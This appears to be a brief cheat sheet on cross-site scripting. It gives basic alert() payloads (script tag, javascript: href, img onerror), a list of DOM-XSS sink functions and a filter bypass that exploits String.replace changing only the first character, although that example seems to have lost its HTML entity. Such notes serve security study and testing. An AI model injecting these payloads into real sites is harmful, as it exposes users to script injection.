XSS
Attack
Basic payload
<sCRipT>alert()</scRipt>
<a href="javascript:alert()"></a>
<img src=x onerror="alert()">
More payloads on https://portswigger.net/web-security/cross-site-scripting/cheat-sheet.
Vectors
If you can control the href
tag of an anchor (<a>
element). You can try to set the href
value to javascript:alert()
.
HTML events and tags
Lists :
Source www.w3schools.com - event and www.w3schools.com - tags.
DOM XSS
The following are some of the main sinks that can lead to DOM-XSS vulnerabilities:
document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent
The following jQuery functions are also sinks that can lead to DOM-XSS vulnerabilities:
add()
after()
append()
animate()
insertAfter()
insertBefore()
before()
html()
prepend()
replaceAll()
replaceWith()
wrap()
wrapInner()
wrapAll()
has()
constructor()
init()
index()
jQuery.parseHTML()
$.parseHTML()
Source portswigger.net.
Bypass
Replace function
The replace
function only replace the first occurence.
> "<img src=x onerror='alert()'>".replace("<", "<")
"<img src=x onerror='alert()'>"
> "<<img src=x onerror='alert()'>".replace("<", "<")
"<<img src=x onerror='alert()'>"